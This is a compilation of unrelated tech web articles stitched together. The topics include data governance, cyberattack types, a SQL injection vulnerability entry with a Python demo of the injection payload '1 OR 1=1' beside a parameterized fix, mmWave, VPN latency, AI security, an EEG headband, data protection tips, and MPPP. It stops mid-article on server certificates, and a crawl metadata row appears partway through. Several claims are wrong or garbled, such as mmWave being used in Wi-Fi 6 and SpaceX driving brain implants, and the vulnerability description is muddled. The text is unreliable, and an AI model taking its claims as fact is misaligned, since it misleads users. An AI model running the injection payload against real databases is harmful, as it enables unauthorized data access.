So – there’s plenty of similarities between these areas, but there are also differences worth being aware of. These are down to their focus, scope, responsibility, and where the responsibility for decision-making lies:
- The two areas focus on different parts of the data lifecycle. While data management focuses more on the technical and operational aspects of handling data, data governance is more concerned with establishing policies, standards, and controls.
- The scope of each principle is different. The key foundations of data governance go a lot deeper than those of data management. Data management is narrower in scope and revolves around technical processes.
- The responsibility for management and governance should be handled by separate teams (or individuals). This means that decision-making is very different – decisions about data management can be made on the fly by technical experts, while data governance changes take longer and require more sign-offs from different parts of the company's leadership team.
Data quality relies on both!
Overall, you shouldn’t make a choice between data governance and data management. A data-driven organization will rely on both disciplines to achieve data integrity, break down data silos, and ensure that data is always used effectively.
As a result, there’s no doubt that both areas require significant investment. As we’ve seen:
- Data governance gives the overarching guidelines for accountability, authority, and direction.
- Data management implements practices that make sure the governance policies are followed effectively.
- The two areas have distinct overlaps in their goals and the specific areas they are concerned with.
- However, management and governance involve slightly different scopes, processes, and personnel.
The two concepts complement each other, creating a holistic approach to managing and governing data effectively. In short, don't make "data governance vs data management" into a fight to the death – the only loser will be your business!
Every organization, regardless of size or industry, can be a target of a cyberattack resulting in significant financial and reputational damages. Internet-enabled theft, fraud, and exploitation were responsible for a staggering $2.7 billion in financial losses in 2018. The FBI receives an average of 900 internet crime complaints each day, according to the FBI Internet and Crime Complaint Center. The Ponemon Institute states that, on average, it takes organizations 191 days to identify a data breach.
Fileless attacks are on the rise and exploit vulnerabilities in software and applications already installed on a computer. They can also be embedded into webpages. This type of attack, typically undetected by traditional antivirus software, is ten times more likely to succeed than file-based attacks. Approximately 77% of successful attacks in 2017 were fileless (Ponemon Institute).
Zero-day attacks are similar to fileless attacks and exploit a security vulnerability in a webpage or application that is unknown to the organization. These attacks can reveal passwords, personal information, browsing history, and more. There is no time between when the vulnerability is discovered and the attack. Zero-day attacks are increasing among advanced hackers and can be some of the most difficult to defend against. Zero-day attackers want to remain undetected as long as possible and exploit victims incessantly for days, months, or even years. Countless new vulnerabilities are exploited daily via zero-day attacks.
Cryptojacking is the unauthorized use of someone else's computer to mine cryptocurrency. Attackers prey on insecure web applications and servers that are exposed to the internet or located in an internal network. They plant cryptomining code that consumes resources and can extract data. Cryptojacking attacks are on the rise, with constant attention paid to misconfigured public cloud instances.
Phishing emails are complex, highly-targeted attacks that have grown in sophistication due to professional hackers recognizing the significant financial opportunity in identifying and targeting employees within an organization. Phishing emails can appear to be sent from a colleague discussing a current project, because the attacker has taken the time to discover corporate initiatives. The majority of malware is still delivered by email.
Ransomware, a form of malware that holds a computer hostage until a ransom is paid to the attacker, is the most popular phishing attack. Ransomware attacks are growing in both frequency and sophistication, despite best efforts from industry experts and law enforcement. In fact, nearly 93% of phishing emails contain or link to ransomware.
Distributed denial of service (DDoS) attacks are launched from multiple computers and internet connections to flood targeted network infrastructure with traffic — ultimately causing a denial of service. DDoS attacks are becoming more frequent and longer-lasting, causing more financial and reputational damage than ever before.
For more information, visit www.fnts.com.
Data provenance is essential for maintaining trust and integrity in data management. It involves tracking the origin of data and understanding how it has been processed and handled over time. By focusing on fundamental principles such as identity, timestamps, and the content of the data, organisations can ensure that their data remains accurate, consistent, and reliable.
Implementing data provenance does not require significant changes or large investments. Existing technologies and techniques can be seamlessly integrated to provide greater transparency and control over data. With data provenance, businesses can confidently manage their data, enhancing decision-making and fostering stakeholder trust.
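To make those principles concrete, a provenance record can be as small as a tuple of who, when, and what. The sketch below is a deliberately simplified, hypothetical example in Python; real systems, including the formats SCITT standardizes, are far richer:

```python
import hashlib
import json
from datetime import datetime, timezone

def provenance_record(actor: str, data: bytes) -> dict:
    """Capture the three basics: identity, timestamp, and content."""
    return {
        "actor": actor,  # identity: who produced or handled the data
        "timestamp": datetime.now(timezone.utc).isoformat(),  # when it happened
        "sha256": hashlib.sha256(data).hexdigest(),  # fingerprint of the content
    }

record = provenance_record("ingest-service", b"quarterly-sales.csv contents")
print(json.dumps(record, indent=2))
```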
In this episode, Jon Geater, Co-Chair of the Supply Chain Integrity Transparency and Trust (SCITT) Working Group, speaks to Paulina Rios Maya, Head of Industry Relations, about data provenance.
- Data provenance is knowing where data comes from and how it has been handled, ensuring trust and integrity.
- The fundamental principles of data provenance include identity, timestamps, and the content of the data.
- Data provenance can be implemented by integrating existing technologies and techniques without significant changes or investments.
- Data provenance helps with compliance, such as GDPR, by providing a transparent record of data handling and demonstrating compliance with requests.
00:00 - Introduction and Background
02:01 - Understanding Data Provenance
05:47 - Implementing Data Provenance
10:01 - Data Provenance and Compliance
13:50 - Success Stories and Industry Applications
18:10 - Conclusion and Call to Action
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Ovidentia CMS 6.x contains a SQL injection vulnerability in the "id" parameter of index.php. The "checkbox" property into "text" data can be extracted and displayed in the text region or in source code.
CWE-89 - SQL Injection
Structured Query Language (SQL) injection attacks are one of the most common types of vulnerabilities. They exploit weaknesses in vulnerable applications to gain unauthorized access to backend databases. This often occurs when an attacker enters unexpected SQL syntax in an input field. The resulting SQL statement behaves in the background in an unintended manner, which allows the possibility of unauthorized data retrieval, data modification, execution of database administration operations, and execution of commands on the operating system.
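The standard defense against CWE-89 is to keep SQL syntax and user input separate with parameterized queries. The following Python/sqlite3 sketch (a generic illustration, not Ovidentia code) shows the vulnerable pattern next to the fix:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE articles (id INTEGER, body TEXT)")
conn.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "a"), (2, "b")])

user_input = "1 OR 1=1"  # attacker-controlled "id" parameter

# VULNERABLE: the input is pasted into the statement, so the injected
# "OR 1=1" becomes SQL syntax and the WHERE clause matches every row.
rows = conn.execute(f"SELECT * FROM articles WHERE id = {user_input}").fetchall()
print(len(rows))  # 2 -- the whole table leaks

# SAFE: the driver binds the value as data, never as SQL syntax.
rows = conn.execute("SELECT * FROM articles WHERE id = ?", (user_input,)).fetchall()
print(len(rows))  # 0 -- "1 OR 1=1" is not a valid id
```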
What is mmWave?
Millimetre wave (mmWave) is a high-frequency band of the electromagnetic spectrum. mmWave frequencies are typically between 30 GHz and 300 GHz. These frequencies are much higher than those used in cellular networks and Wi-Fi, which operate in the low- to mid-GHz range.
mmWave signals have very short wavelengths, which means they can carry a lot of data. But because they are so high-frequency, they are also very susceptible to interference and obstacles. This makes it difficult to use mmWave for long-range communications.
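The name comes straight from the physics: wavelength equals the speed of light divided by frequency, which for 30-300 GHz works out to roughly 10 mm down to 1 mm. A quick check:

```python
C = 299_792_458  # speed of light, m/s

def wavelength_mm(freq_ghz: float) -> float:
    """Wavelength in millimetres for a frequency given in GHz."""
    return C / (freq_ghz * 1e9) * 1000

print(round(wavelength_mm(30), 1))   # ~10.0 mm at 30 GHz
print(round(wavelength_mm(300), 1))  # ~1.0 mm at 300 GHz
```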
mmWave is being used in some 5G cellular networks, as well as in short-range applications such as Wi-Fi 6.
With numerous cloud storage applications, VPNs, and remote servers all referring to latency, it’s important to identify just what latency is.
In the simplest terms, latency refers to the delay between making an action on a web application or server and when that action actually takes place. At its core, it’s the total time accrued for data to travel, usually measured in milliseconds. While latency can be shortened or narrowed, it can never be instantaneous because the data must travel a physical distance.
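Because latency is just elapsed time, you can measure it yourself. The sketch below times a TCP connection using only Python's standard library; the hostname is a placeholder, and a real test would average many samples:

```python
import socket
import time

def connect_latency_ms(host: str, port: int = 443) -> float:
    """Time the TCP handshake to a server, in milliseconds."""
    start = time.perf_counter()
    with socket.create_connection((host, port), timeout=5):
        pass  # connection established; close immediately
    return (time.perf_counter() - start) * 1000

print(f"{connect_latency_ms('example.com'):.1f} ms")
```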
If you’ve ever uploaded files to a cloud storage application like OneDrive, Google Drive, or Drop Box, the time it takes for the data to be available in the cloud is your latency. Large files can take several minutes or more depending on the size. It might not seem too long to wait for a single upload, but if a team of remote users are collaborating on a large file, high latency means a lot of time will be spent discovering ways to waiting for file uploads and downloads.
VPNs are a common way for businesses to secure connections to private networks for remote users. With a single sign-on, a user can access their in-office desktop or on-premises server. In terms of latency, the most obvious variable is the physical distance between the remote user and the server they're connecting to. It takes quite a bit longer to transfer data from Australia to Canada, for example, than from New York to Boston. While decreasing the distance to the server is not always an option, there are other ways to narrow latency.
As mentioned above, latency can never be instantaneous. With each additional node in a VPN, latency increases. For example, if a remote user accesses their in-office desktop to then access the on-premises server from that desktop, latency will be increased. Removing the different steps to access data is a surefire way to lower latency.
Another way to shrink latency and garner faster download and upload speeds is to decrease the server load. Although this is easy enough using a personal VPN that can access servers all over the world, it becomes more difficult for small to medium-sized businesses for different reasons. As Network Attached Storage (NAS) is usually located on the premises of a business, all remote users would be accessing the same servers and storage. Therefore, decreasing server load isn’t always an option for most businesses.
One of the easiest, but not the most cost-effective ways to lower latency is to upgrade a user’s internet speed. Because latency is defined by speed, the faster a user’s connection, the quicker data can transfer. Downloading or uploading files to cloud storage applications can vary widely with different internet speeds. If a user is in a remote location with a less than ideal internet connection, latency could become a larger issue.
Fortunately, there are alternative models to VPNs and cloud storage applications. Operating with the same functionality as a traditional NAS, a Cloud NAS offers users a low latency solution. Instead of routing through various nodes to access the desired server and thus increasing latency, the user has instant access to their files in the Cloud NAS. In that vein, users won’t need to upload or download to a storage application as everything will be immediately available. And for those remote users with tough internet connections? Morro Data’s CacheDrive allows large files to be instantly accessible.
Learn more about Morro Data and Cloud NAS today!
AI Series Part 6: Securing and Fixing AI-Based Systems
This is the sixth and final piece in a series exploring the impacts of artificial intelligence on modern life and the security of AI-based systems. In the previous article, we discussed some of the security issues associated with AI, and we explore how to secure and fix AI in this piece.
How to Secure AI-Based Systems
Machine learning algorithms can suffer from biases even in the best of circumstances. This makes it relatively easy for an intentional attack against these systems to result in an inaccurate and ineffective decision-making system.
Performing adversarial testing and corrupting training data are two ways in which an attacker can “hack” an AI-based system. Protecting against these potential attack vectors is essential to ensuring AI accuracy and security.
Perform Adversarial Testing First
Systems built using machine learning are designed to build a model from a set of observations and use this model to make decisions. This means that an AI-based system could be trained to predict and manipulate the decisions of another AI-based system, a practice called “adversarial testing.”
As AI-based systems become more central to daily life and used in critical decision-making, such as autonomous vehicles or cyber defense, cyber threat actors will employ adversarial machine learning against these systems. The best way to protect against these types of attacks is to do so first.
By performing adversarial testing of machine learning systems, the developers can identify weak points in the model where a small change can have a dramatic impact on the results. This information can be used to inform further training of the system, resulting in a model that is more resilient against attack.
Modern machine learning algorithms are imperfect, meaning that they make classification errors. Human beings are far better at certain types of problems than machines, which is why image-based CAPTCHA challenges are a common method of bot detection and defense. However, by using adversarial machine learning to make it more difficult to identify these weak points in a model, machine learning developers can increase the resilience of their systems against attack.
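To make the idea concrete, the snippet below sketches the fast gradient sign method (FGSM), one of the simplest adversarial techniques: nudge each input feature in the direction that most increases the model's loss. It assumes PyTorch and a toy stand-in classifier, not any particular production system:

```python
import torch
import torch.nn as nn

model = nn.Linear(4, 2)           # stand-in for a trained classifier
loss_fn = nn.CrossEntropyLoss()

x = torch.rand(1, 4, requires_grad=True)  # a benign input
y = torch.tensor([0])                     # its true label

# Gradient of the loss with respect to the input itself.
loss = loss_fn(model(x), y)
loss.backward()

# FGSM: a small step along the sign of that gradient often changes the
# prediction while leaving the input almost unchanged.
epsilon = 0.1
x_adv = (x + epsilon * x.grad.sign()).detach()

print("original:", model(x).argmax().item(),
      "adversarial:", model(x_adv).argmax().item())
```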
Implement Training Data Verification and Validation Processes
Good training data is essential to the effectiveness of an AI-based system. Machine learning systems build their models based on their training datasets. If the training data is inaccurate or corrupted, the resulting AI model is broken as well.
For this reason, corruption of training data is a low-tech approach to breaking AI systems. Whether by inserting incorrect data into initial training datasets or performing “low and slow” attacks to slowly corrupt a model, an attacker can skew a machine learning model to misclassify certain types of data. This could result in a missed cyberattack or an autonomous car running a stop sign.
The datasets that AI-based systems train on are often too large and complex to be completely audited by humans. However, machine learning researchers can attempt to minimize the risk of these types of attacks via random inspections. By manually validating a subset of the data and the machine learning algorithm’s classifications, it may be possible to detect corrupted or otherwise inaccurate inputs that could undermine the accuracy and effectiveness of the machine learning algorithm.
Beyond this, standard data security practices are also a good idea for training datasets. Restricting access to training data, performing integrity validation using checksums or similar algorithms, and other steps to ensure the accuracy of training data can help to identify and block attempts at corruption of training data.
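The checksum idea is straightforward to automate. A minimal sketch (file names and layout are assumptions) that fingerprints a training set once and later flags any file that no longer matches:

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def build_manifest(data_dir: str) -> dict:
    """Record a fingerprint for every file in the training set."""
    return {p.name: sha256_of(p) for p in sorted(Path(data_dir).glob("*.csv"))}

def verify(data_dir: str, manifest: dict) -> list:
    """Return the names of files that no longer match the manifest."""
    return [name for name, digest in manifest.items()
            if sha256_of(Path(data_dir) / name) != digest]

manifest = build_manifest("training_data")    # run once, store securely
print("corrupted files:", verify("training_data", manifest) or "none")
```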
Building AI for the Future
As earlier articles in this series have discussed, artificial intelligence is already a major part of daily life. As AI becomes more mature, this will only become more common as machine learning algorithms are deployed to solve hard problems in a variety of different industries.
AI has the potential to do a lot of good, but it can also cause a lot of damage in the wrong hands. In addition to making sure that AI works, it is also essential to ensure that it does its job accurately and securely.
Picture this. You’re back in school, it’s exam week, you have multiple exams coming up that you absolutely need to do well on, but lately you have been getting so flustered with the tasks you need to get done that you unintentionally lose focus.
Sound like a familiar scenario? Chances are you have gone through this hectic pace of thought process at one point or another in your life, but what if you were told that you can easily prevent this from ever happening again by putting on a headband for three minutes a day?
With seven sensors, five hours of battery life, and an application that tracks the user’s progress, the Muse Brain Sensing Headband allows users to become more focused through meditation. All you have to do is turn on the headband, pair it with the application, open the application, put on your headphones, and listen to the guide.
A headband that allows you to be your best self in under three minutes a day sounds like a sweet deal, but how does it exactly work?
As I was doing my research on this topic, I noticed that not many articles give an in depth analysis of how the brain receives signals, which I believe plays a crucial role in truly understanding brain sensing technology. This is why I have decided to do just that.
In this article, I will first go over the physiology of the brain as I discuss the details of neurotransmission. I will follow that with a short discussion of the technology that is inspired by this physiology. Lastly, I will go over how brain computing (or brain sensing/analyzing) is going to evolve in the coming years.
Let’s Talk Brain Science: Neurotransmission
Let’s first discuss how signal transduction works in the cells of the body. When a ligand, a small molecule that acts as a signal, binds to a receptor, a series of pathways occur within the cell that help activate a target protein or molecule.
In other words, a signal molecule latches onto a specific binding site, turns on another target molecule downstream of the receptor, and continues turning on other target molecules and proteins until the designated signal is produced. This signal produced then moves up the spine and to the brain where neurons are located.
Your brain is home to approximately 100 billion neurons, nerve cells that allow you to react to signals. These minute cells work in a very synchronized manner. A neuron consists of a nucleus, axon, dendrites, myelin sheath, and an axon terminal.
A signal is transmitted to a neuron in the form of an electrical impulse known as an ‘action potential’ which then moves from the dendrites of the neuron to the axon terminal. The action potential causes the nerve cell to release neurotransmitters (signaling molecules) which then bind to the receptor on the next neuron.
The area between the two neurons where all of this is taking place is called the synapse. If the electrical charge on these neurotransmitters that are released into the synapse is above the threshold, then an action potential will be fired, but if not, then nothing will happen and that will be the end of the signal transduction. These two states are known as the excitatory and inhibitory states respectively.
When a group of neurons experience this change in electrical impulse, they generate an electrical field which resembles a small vibration and which can be then detected on the scalp by an EEG sensors.
In short: the brain receives an electrical signal, which causes an action potential within neurons. The action potential moves across neurons through a synapse, which generates an electrical field that is detectable by sensors on the scalp.
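The threshold behaviour described above, firing only when the summed input crosses a threshold, is easy to caricature in code. This is a toy illustration of the excitatory/inhibitory idea, not a physiological model:

```python
def neuron_fires(inputs: list, threshold: float = 1.0) -> bool:
    """Sum excitatory (+) and inhibitory (-) inputs; fire above threshold."""
    return sum(inputs) >= threshold

print(neuron_fires([0.4, 0.5]))         # False: below threshold, signal stops
print(neuron_fires([0.4, 0.5, 0.3]))    # True: an action potential fires
print(neuron_fires([0.9, 0.6, -0.7]))   # False: inhibitory input suppresses it
```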
Discovered in 1924 by the German psychiatrist Hans Berger, electroencephalography, or EEG, works by measuring in real time the differences in the electrical field produced by neurotransmission. In traditional EEG testing, rows of electrodes are placed on a person's scalp, with wires that hook them up to an amplifier that strengthens the waves that are picked up, and a computer that records all of the data.
The data is presented on a graph in real time as the electrodes pick up the electrical field on the scalp. Scientists decode this data by analyzing the types of waves that are present. There are a total of five frequency bands: Delta, Theta, Alpha, Beta, and Gamma (ordered from lowest to highest frequency).
These neural patterns that are picked up by the electrodes are then used by researchers to analyze cognitive behavior. For instance, in sleep research, researchers will look for delta waves to see how deep a patient is able to fall asleep. Likewise, they will look for higher frequency waves such as gamma or beta waves to check if the patient is still in REM sleep.
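A rough sketch of how software might turn raw samples into one of those bands: estimate the dominant frequency with an FFT and bucket it. The band boundaries below are common approximations and vary slightly between sources:

```python
import numpy as np

BANDS = [(4, "delta"), (8, "theta"), (12, "alpha"),
         (30, "beta"), (float("inf"), "gamma")]

def dominant_band(signal: np.ndarray, sample_rate: float) -> str:
    """Name the frequency band holding the strongest peak in the signal."""
    spectrum = np.abs(np.fft.rfft(signal))
    freqs = np.fft.rfftfreq(len(signal), d=1 / sample_rate)
    peak = freqs[np.argmax(spectrum[1:]) + 1]  # skip the DC component
    return next(name for upper, name in BANDS if peak < upper)

# One second of a 10 Hz oscillation sampled at 256 Hz reads as alpha.
t = np.arange(0, 1, 1 / 256)
print(dominant_band(np.sin(2 * np.pi * 10 * t), 256))  # alpha
```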
With its noninvasive method of use, this technology allows scientists and physicians to record when and where a particular activity has taken place in a subject’s brain. From these findings, they are then be able to interpret how the subject was feeling during a particular conversation – were they bored and unresponsive? Engaged and thinking critically? Were they focused on the conversation or task without any interruptions?
From sleep behavior to consumer behavior, EEG technology allows us to delve deeper into the human brain on a more factual basis.
The IoT Method to Brain Sensing
In 2014, with almost $170,000 and 644 backers, Joel Murphy and Conor Russomanno successfully released OpenBCI (BCI standing for Brain Computing Interface), an open source biosensing platform that allows consumers to track the electrical activity produced by the brain, heart, and muscle.
For the first time ever, this technology became accessible to the general public, which paved the way for world changing inventions.
Fast-forward to 2017 and you can find brain sensing products all over the web. From a headband that allows users to meditate to trendy eyewear that help athletes stay fashionable while also improving their focus, these devices are becoming prevalent in everyday life. But how do these companies incorporate EEG technology into these products to begin with?
Just as a traditional EEG cap places electrodes all across the skull, headbands like InteraXon’s Muse Brain Sensing Headband work by placing sensors along the forehead and behind the ears. Once the headset is paired with its application, the electrical impulses that are read by the sensors are immediately visualized in the app.
Depending on the types of brainwaves that are picked up, the application determines if the user needs to become more focused or not. If the waves increase in frequency, that indicates to the software that the user is distracted from the given task, and as a feedback response to these waves, the application increases the volume of the sound that the user is hearing in an attempt to get the user to refocus.
While extremely straightforward, in order to get the most accurate reading, one needs electrodes to be placed all over the scalp, and around the eyes, since the impulses are spread across the skull like mini vibrations.
With the frontal cortex being the primary location for problem solving, judgement, and impulse control, it makes sense why the Muse Brain Sensing Headband has sensors that are placed along the forehead.
While it may not be able to get an accurate read on the brain as a whole, it is able to track the activity of the frontal lobe, where our ability to control focus is located. Thus, this headband can strongly aid in training the frontal cortex to react more calmly to impulse and think through actions rationally with a more focused mindset.
Brain Chipping: The Future of Brain Computing Technology
Brain sensing technology is prominently used for its many medical benefits, including helping cancer patients relieve stress to increase their rate of recovery. But what if these efforts could also be put toward making everyday life easy and seamless?
By now, we’ve all heard of the new trend called “chipping,” well what if we used this same method to control everyday tasks such as turning on/off lights, locking the doors to your house, turning off your alarm clock in the morning, etc.?
At the rate this technology is being leveraged by major tech companies such as SpaceX, within the next few decades (possibly earlier), we will see people getting sensors implanted along their skull and integrated with different software to allow human beings to take full control of their lives.
Looks like movies aren’t all lies after all. The only plot twist in this reality movie is that we are becoming our own robots. Until then, however, there’s a lot of work that has to be done to ensure clear, precise data before we can start merging the human brain with AI. | <urn:uuid:53f94227-3d9f-4c79-b40c-c7e78e6cba19> | CC-MAIN-2024-38 | https://www.iotforall.com/brain-sensing-technology-muse-headband | 2024-09-18T10:34:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651895.12/warc/CC-MAIN-20240918100941-20240918130941-00541.warc.gz | en | 0.953475 | 1,787 | 3.015625 | 3 |
Online Data Protection - What, Why & How?
Date: 26 October 2022
Data is the new gold. Every business out there is looking for precious customer data on which to base their marketing endeavours, engineer new products and target the correct audiences. Therefore, protection of data and preventing the misuse of sensitive personal information has become extremely critical in the digital age.
It is not only important for businesses to prioritise the safety of sensitive customer data but also for individuals to be more mindful of their data safety.
What is Personal Data?
Personal data is your personal identifier. It's the data that is unique to you and makes you identifiable, directly or indirectly. Many people still don't care that personal data is prone to misuse by criminals on the internet. In reality, however, personal data theft is highly dangerous and can compromise your sensitive information to a vast degree.
For businesses, it is important to pay attention to the security of the personal information they store and process, especially if they come under the purview of the General Data Protection Regulation or GDPR. Many businesses choose to hire cybersecurity experts through flexible formats like the Virtual Cyber Assistant with the assistance of GDPR software to ensure they meet GDPR compliance requirements. This also helps them improve their data protection and risk management over time.
Weak data protection in some countries has resulted in widespread leaks of citizen information. This is evidenced by the frequent occurrence of cybercrime cases, such as the hacking and cracking of social media accounts, which leads to personal data breaches, extortion, online fraud via cell phones, and more.
Activities in the digital space require personal data because we do not meet each other physically, so data becomes an online identifier. Leakage of personal data can lead to a crime because once the hackers get it, your virtual tracks can always be traced and misused.
In the case of businesses, a breach of personal customer or employee data can be the start of serious cyber attacks or ransomware attacks on critical infrastructure. This information involves the date of birth, cell phone number, password, and other identifications.
Why Is Personal Data Protection Important?
In terms of online cybersecurity, there are five main reasons why it is important to protect personal data, namely:
- Prevent gender-related online bullying;
- Prevent misuse of personal data by irresponsible parties;
- Avoid potential fraud;
- Avoid potential defamation; and
- Gain the right of control over personal data.
Online fraud is happening every minute, with hackers coming up with new and more advanced techniques all the time. Victims are often people who have no knowledge of these scams, or who are not sufficiently aware of or trained in cybersecurity.
Every business must educate their staff in the importance of online personal data protection. They should help their employees understand how their online activity affects them and the business. Staff should also be given basic Cyber Incident Response training so they know what to do in case they feel they’ve clicked on a malicious link or downloaded an infected attachment.
Many social media applications provide two-step verification features, backup codes, and e-mail notifications when other parties access our accounts. We need to enable these features to prevent something bad from happening.
As a smart society and business community, we must be digitally literate, willing to cultivate the habit of careful reading, and ready to double-check any information we receive.
It is also advised to have an additional layer of protection, which can be obtained through a VPN. A Virtual Private Network masks your IP address so that no one can learn your location. We recommend the best ones on the market; for further information, you can see this in-depth ExpressVPN review from Wizcase. Consider the price and the services to see whether it's suitable for you.
Simple Tips to Make Personal Data Secure
While online risk management can sound like a complicated subject, there are many things you can do on an individual basis to keep your information safe. Here are a few simple steps everyone can take to make their personal data more secure on the internet:
1. Create a Password and PIN as Strong as Possible
We always recommend making passwords and PINs as strong as possible, using a combination of uppercase and lowercase letters, special characters, and numbers. You should also change your passwords and PINs regularly to prevent your accounts from being hacked, and avoid easily guessed passwords such as "12345" or your birth date.
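If inventing strong passwords is a chore, let the computer do it. A minimal sketch using Python's standard `secrets` module, which is designed for cryptographically secure randomness:

```python
import secrets
import string

def generate_password(length: int = 16) -> str:
    """Build a random password from letters, digits, and punctuation."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # different on every run
```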
2. Get Used to 2FA Activation
We should also enable 2FA (two-factor authentication) wherever applicable. This is a relatively safe way to protect personal data because when we log in to an account, an OTP (one-time password) code is sent in addition to the password. The code is sent via e-mail or SMS. So, don't forget to activate 2FA.
3. Have More Than One Email
Having multiple email accounts is highly recommended to support 2FA. In addition, some digital platforms are currently required to include a backup email. The goal is that you’ll get notifications on the alternate email when someone else breaches your first account or there are indications of an account break-in.
4. Be Careful in Giving Access Permissions
You also have to be careful about granting access to some digital platforms to maintain data security. Access permissions usually appear for photo and video gallery, camera, microphone, and others. If you feel unsure and suspicious about granting access, simply don't give access to the application.
5. Don't Post Personal Information on Social Media
If you can, do not post any information related to personal data on social media. If you do want to post, censor important details so your personal information remains private. It's safest not to post personal information such as your credentials, address, or phone number, anything that identifies an individual.
Most people probably use social media today; it’s inevitable. Although some choose to be private by creating private accounts, more people decide to share everything about their life on the internet. They even share personal things like relationships, their cultural or social identity, political views, etc., without worrying about getting hacked. And this is what you need to avoid.
You may create anything you want, but remember to keep your personal matters private. To further protect you from personal data theft, creating a private account that only allows close friends to see your profile is the best.
6. Regularly Clean Cookies
The next way to protect personal data is to clean cookies regularly. Why? Because cookies store important data and information about us while we use or access certain websites on the internet.
Maintaining the sanctity of personal and business data is seriously critical today. As we said at the beginning, data is the new gold, and everyone is looking for it, to harness its benefits for both good and harmful purposes. It is best to start putting basic data protection measures in place and securing your sensitive and personal information at the earliest opportunity.
November 6, 2018
AI has become a bigger part of our everyday lives – and it also hits the headlines a lot. It's difficult to keep track of all the stories and new developments, but a new infographic, Rise of the Machines, aims to help separate fact from fiction.
So, What Is AI?
AI stands for artificial intelligence. Artificial intelligence is software that has the ability to learn, adapt, and solve problems in a way that's similar to the human brain.
There are two types of AI: narrow, which can do specific activities, and general, which can use its past experience to complete new tasks. Narrow AI is much more common.
What Can AI Do?
AI is capable of a lot of different tasks, big and small. It’s ideal for carrying out monotonous tasks that humans might get wrong or get bored of, since it doesn’t make the same errors we do, and its speed means it can save time for researchers. It’s also useful for security because it can’t be bribed or blackmailed. And its ability to make predictions could become vital for healthcare.
Read on to find out what else could be in store for AI as the technology becomes more advanced.
MPPP, which stands for Multilink Point-to-Point Protocol, is a protocol for inverse multiplexing of Point-to-Point Protocol (PPP) communication links. Multilink Point-to-Point Protocol is an extension of the industry-standard PPP. MPPP is also abbreviated as MP or MLP.
How it works
An ordinary dial-up modem connection to the Internet through an Internet service provider (ISP) usually uses PPP as its wide area network (WAN) data-link protocol, but sometimes the 56-Kbps speed provided by V.90 modems is insufficient. MPPP allows multiple physical dial-up links to be inverse multiplexed together to form a single high-bandwidth logical PPP connection between the dial-up client and the ISP. MPPP works by ordering the data frames from the client across the multiple PPP channels and recombining them at the ISP’s termination point, and vice versa. MPPP defines protocols for splitting the data stream into PPP packets, sequencing the packets, transmitting them over separate logical data links, and then recombining them at the receiving station.
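The split-sequence-recombine idea is simple to caricature. The toy sketch below tags fragments with sequence numbers, deals them across two "links", and reorders them on arrival. It illustrates the concept only; it does not reproduce the real MPPP frame format:

```python
def split(data: bytes, size: int) -> list:
    """Cut a data stream into sequence-numbered fragments."""
    return [(i, data[o:o + size]) for i, o in enumerate(range(0, len(data), size))]

def reassemble(fragments: list) -> bytes:
    """Reorder fragments by sequence number and rejoin the stream."""
    return b"".join(chunk for _, chunk in sorted(fragments))

stream = b"PPP payload split across two dial-up channels"
fragments = split(stream, 8)
link_a, link_b = fragments[0::2], fragments[1::2]  # round-robin over two links

# Fragments may arrive interleaved in any order; sequencing restores the stream.
assert reassemble(link_b + link_a) == stream
```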
MPPP is also supported by some ISDN terminal adapters to allow two 64-Kbps Integrated Services Digital Network (ISDN) channels to be inverse multiplexed together into a single 128-Kbps channel using the bonding protocol.
More channels can be aggregated for even greater bandwidth. Microsoft Windows 98 supports MPPP for both analog modems and ISDN terminal adapters.
In the Remote Access Service (RAS) of Windows NT, MPPP is known as RAS Multilink Channel Aggregation and supports the aggregation of two or more analog modems or ISDN terminal adapters (or a combination of both). RAS Multilink Channel Aggregation was originally based on Request for Comments (RFC) 1717 and is supported by Windows NT Server and Windows NT Workstation, although it is only supported for dial-out connections on Windows NT Workstation. Multilink in the Windows 2000 Routing and Remote Access feature supports RFC 1990, which obsoletes RFC 1717.
MPPP connections aggregated across multiple routers
An extension to MPPP called Multichassis Multilink Point-to-Point Protocol (MMP), which some vendors support, allows MPPP connections to be aggregated across multiple routers and network access servers (NAS’s) in a way that is transparent to the dial-up MPPP client. In other words, the client initiates an MPPP session but is actually connected to several MMP-enabled NAS’s at the ISP instead of only one NAS as in the usual scenario. MMP enables the data stream to be split, sequenced and recombined at several different points to provide a single logical connection between the client and the ISP.
Another extension to MPPP that some vendors support is called Multichannel PPP (MPP), which in addition to inverse multiplexing of PPP links also supports session and bandwidth management functions, including the dynamic addition or removal of channels without the need to reinitialize the link. Both the client and the server must support MPP for this to work.
Using MPPP for dial-up connection to the Internet
To use MPPP for a dial-up connection to the Internet, your ISP's NAS must also support this protocol. RAS Multilink Channel Aggregation for Windows 98 or Windows NT functions best if all devices are of the same type (analog or ISDN) and operate at the same speed. When a Windows dial-up client attempts a multilink connection, it first establishes the primary connection using the first installed device, and then it successively aggregates each additional device.
In today's data-driven economy, payments are made not only in cash at commercial banks, but also in the exchange of personal data with search engine giants. Banks and search engines alike diligently convert and process transactions, whether in the form of cash or data, and turn them into valuable assets.
Many are all too aware of the fact that data resides everywhere and that it’s the insights you can glean from data that are more important; it’s no longer a case of who has the most data, but rather who can do the most with that data.
In this whitepaper you will learn about:
- The importance of deriving insights through analytics.
- How people who are new to analytics can get started.
- Best practice applications with regards to data analytics.
DATA IS NOT BIG, IT IS JUST GETTING BIGGER
Our hyperconnected world is generating data at an ever increasing rate; every day we collectively produce 2.5 billion gigabytes of data. Moreover, the global volume of data in today’s digital world is expected to multiply by at least another 40 times by the year 2020, much of which will consist of unstructured data.
Formerly, the majority of data was structured and organized in database tables. Yet, as the world has gone digital with the emergence of the Internet, almost all information has been translated into strings of ones and zeros, ready to be stored, processed, evaluated and analyzed.
How To Resolve Untrusted Server Certificate Errors
An untrusted server certificate error is usually triggered when an anomaly is identified in the way a website or an application handles your data. This commonly happens when your home or enterprise network is not configured properly.
In today’s environment where work from home is becoming more common, WiFi or VPN connections also tend to cause this error. There is, however, a chance that it is an attempt by hackers to initiate a man-in-the-middle attack. To mitigate that risk, it’s important that we understand the basics of what a server certificate is, as well as some of the common security errors of untrusted server certificates and how to solve them.
What is a Server Certificate
